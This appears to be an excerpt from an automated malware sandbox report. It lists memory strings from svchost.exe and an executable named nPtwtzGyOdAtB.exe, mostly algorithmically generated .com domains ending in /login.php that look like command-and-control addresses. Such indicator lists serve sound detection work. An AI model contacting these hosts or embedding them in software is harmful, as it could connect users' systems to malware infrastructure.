Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegysyg.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegytop.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyval.com/http://purytyg.com/http://purytyg.com/http://qegyval.com/http://vocyjic.com/http:
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyval.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyvuq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qegyxav.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekyfeg.com/login.php
Source: svchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekyhil.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2011810643.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekyhug.com/login.php
Source: svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qekykev.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1847235864.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845892034.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1847068587.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1847128005.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845987393.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekykup.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664428957.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661481983.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekyluv.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekynuq.com/
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekynuq.com/H
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qekyqop.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648070186.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651544037.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekysel.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656159137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657341633.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656157026.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656025861.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekytig.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084822511.000000000CD2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078523532.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087427396.000000000CD2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekyvol.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekyvup.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899366935.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908042179.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qekyxaq.com/login.php
Source: svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2687870645.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078523532.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661728781.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqykop.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqykyv.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871689135.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635455188.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqyloq.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693474228.000000000323A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666289273.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqylyl.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654531739.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655091377.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930331574.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657888632.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqyniq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqyqep.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqyqul.com/H
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qeqyqul.com/http://lysyfyj.com/H
Source: svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735650699.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 